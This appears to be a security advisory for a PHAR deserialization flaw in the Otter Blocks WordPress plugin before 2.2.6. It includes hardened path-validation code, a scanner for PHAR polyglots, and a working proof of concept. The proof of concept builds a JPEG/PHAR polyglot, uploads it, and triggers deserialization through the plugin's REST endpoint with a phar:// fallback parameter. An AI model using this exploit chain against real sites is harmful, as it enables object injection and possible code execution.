The plugin does not sanitize some user-controlled file paths before performing file operations on them. Because PHP's phar:// stream wrapper unserializes an archive's metadata as soon as a file operation opens it, an attacker who can upload a PHAR disguised as an image and point one of those paths at it obtains arbitrary object deserialization. This only affects sites running PHP < 8.0: PHP 8.0 stopped unserializing PHAR metadata automatically on such operations.
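The pattern behind this class of bug, as an added example that is not Otter Blocks code: a request parameter reaching a filesystem call unchanged, beside a hardened version that refuses stream wrappers and confines the path to the uploads directory. The function names, the choice of file_exists() as the file operation (the advisory does not say which call the plugin makes) and the uploads directory are assumptions for illustration.

```php
<?php
// Added example, not code from Otter Blocks: the unsafe pattern the advisory
// describes next to a hardened replacement. The function names, the use of
// file_exists() as the file operation and the uploads directory are
// assumptions chosen for illustration.
declare(strict_types=1);

// Assumed uploads root; in WordPress use wp_upload_dir()['basedir'].
const UPLOADS_DIR = '/var/www/html/wp-content/uploads';

/**
 * Unsafe: the request parameter reaches a filesystem call untouched.
 * On PHP < 8.0 file_exists('phar://...') parses the archive manifest and
 * unserializes its metadata, so a PHAR uploaded under an image name hands
 * the attacker an object of any class the application has loaded. The same
 * holds for is_file(), filesize(), fopen(), file_get_contents() and friends.
 */
function fallback_path_unsafe(string $fallback): bool
{
    return file_exists($fallback);
}

/**
 * Hardened: refuse stream wrappers, then canonicalise and confine the path
 * to the uploads directory before the first filesystem call.
 * Returns the resolved path, or null when the input is rejected or absent.
 */
function fallback_path_hardened(string $fallback): ?string
{
    // Any scheme prefix (phar://, php://, data://, file://, ...) is rejected.
    // PHP matches wrapper names case-insensitively, hence the /i flag.
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $fallback) === 1) {
        return null;
    }
    // Embedded NUL bytes are never legitimate in a path.
    if (strpos($fallback, "\0") !== false) {
        return null;
    }
    // realpath() resolves symlinks and "..": only accept results inside the base.
    $base = realpath(UPLOADS_DIR);
    $real = realpath(UPLOADS_DIR . DIRECTORY_SEPARATOR . ltrim($fallback, '/\\'));
    if ($base === false || $real === false) {
        return null;
    }
    if (strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    // Only regular files; directories and special files are not fallbacks.
    return is_file($real) ? $real : null;
}

// Usage: the advisory's payload and a traversal attempt are rejected before
// any filesystem call; a plain relative image path is resolved inside the
// uploads tree (and is null here unless that file actually exists).
$attempts = [
    'phar://wp-content/uploads/2023/04/poc.phar_.jpg/test.png',
    'PHAR://wp-content/uploads/2023/04/poc.phar_.jpg/test.png',
    '../../../wp-config.php',
    '2023/04/logo.png',
];
foreach ($attempts as $attempt) {
    var_dump($attempt, fallback_path_hardened($attempt));
}
```

The wrapper check comes first on purpose: realpath() alone does not help, because the dangerous work happens inside the phar:// wrapper before any path comparison could run. Where an application never needs PHAR archives at runtime, calling stream_wrapper_unregister('phar') during bootstrap removes the wrapper entirely and is a cheap site-level mitigation on PHP < 8.0.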
Note that the following proof of concept requires WordPress to be running a PHP version earlier than 8.0.

1. Create the PHAR file. Put the following PHP code in a file named create_phar.php and run it with `php --define phar.readonly=0 create_phar.php` (the Phar extension refuses to write archives while phar.readonly is on). The opening PHP tag, the class definition, the Phar constructor and the `__HALT_COMPILER();` part of the stub were lost when this page was extracted and are restored here; a PHAR stub must end with `__HALT_COMPILER();` or PHP will not write the archive.

```php
<?php
// Stand-in for the gadget class. Only the class name has to match what the
// server defines in step 3, since the serialized object carries the name.
class Evil {}

$phar = new Phar('poc.phar.jpg');   // ".phar" in the name lets Phar create it, ".jpg" passes the upload filter
$phar->startBuffering();
$phar->addFromString('test.png', 'text');
// JPEG SOI bytes first so the upload looks like an image, then the mandatory stub terminator.
$phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>");
$phar->setMetadata(new Evil());     // unserialized by the server when the archive is opened through phar://
$phar->stopBuffering();
```

2. As an Author user, upload the poc.phar.jpg file through the media library. Note its path on the server (e.g. /wp-content/uploads/2023/04/poc.phar_.jpg; WordPress inserts the underscore when it sanitizes a file name that carries a second extension).

3. Create a simulated gadget on the server by defining the following class somewhere WordPress loads it (for example in a must-use plugin). Its magic method fires when the object is unserialized:

```php
<?php
class Evil {
    function __wakeup() { die('Arbitrary deserialization'); }
}
```

4. Trigger the deserialization with the following code in the browser console, using the path noted in step 2:

```javascript
fetch("/wp-json/otter/v1/dynamic?type=author&uid=1234&context=somecontext&fallback=phar://wp-content/uploads/2023/04/poc.phar_.jpg/test.png")
```

The response ends with "Arbitrary deserialization", confirming that the fallback parameter reached a file operation unsanitized. The entry name after the archive path does not even have to exist: the phar:// wrapper parses the manifest, and unserializes the metadata, before it looks up the entry.
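For the defensive side, an added example that is not part of the advisory or the plugin: a scanner that walks an uploads tree and flags files carrying a PHAR stub terminator, whatever their extension, which is how a polyglot like poc.phar_.jpg shows up after the fact. The uploads path and the read limit are assumptions; pass your own.

```php
<?php
// Added example (not part of the advisory or the plugin): hunt for PHAR
// polyglots in an uploads tree without ever opening them through phar://.
// The uploads path and the 1 MiB read limit are assumptions.
declare(strict_types=1);

/**
 * Returns the paths of regular files under $dir whose leading bytes contain
 * the PHAR stub terminator. A file that passed an image upload filter but
 * carries this marker is almost certainly a polyglot archive.
 *
 * Deliberately a plain byte search on a plain path: constructing new Phar($path)
 * or touching the file through phar:// would unserialize its metadata on
 * PHP < 8.0, i.e. run the very payload being hunted.
 */
function find_phar_polyglots(string $dir, int $maxBytes = 1048576): array
{
    $marker = '__HALT_COMPILER';
    $hits = [];
    $iterator = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($iterator as $entry) {
        /** @var SplFileInfo $entry */
        if (!$entry->isFile()) {
            continue;
        }
        // The stub is the start of a PHAR, so a bounded read of the head is
        // enough and keeps scans of large media cheap. stripos(): PHP locates
        // the terminator case-insensitively, so the hunt does the same.
        $head = @file_get_contents($entry->getPathname(), false, null, 0, $maxBytes);
        if ($head !== false && stripos($head, $marker) !== false) {
            $hits[] = $entry->getPathname();
        }
    }
    sort($hits);
    return $hits;
}

// Usage (path is an assumption; in WordPress use wp_upload_dir()['basedir']):
foreach (find_phar_polyglots('/var/www/html/wp-content/uploads') as $path) {
    echo $path, PHP_EOL;
}
```

Hits are candidates for removal and for a look at the web server logs around their upload time, together with any request whose query string contains phar:// against the affected endpoint.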
| CPE | Name | Operator | Version |
|---|---|---|---|
| | otter-blocks | lt | 2.2.6 |

Affected: otter-blocks versions earlier than 2.2.6 (lt = less than).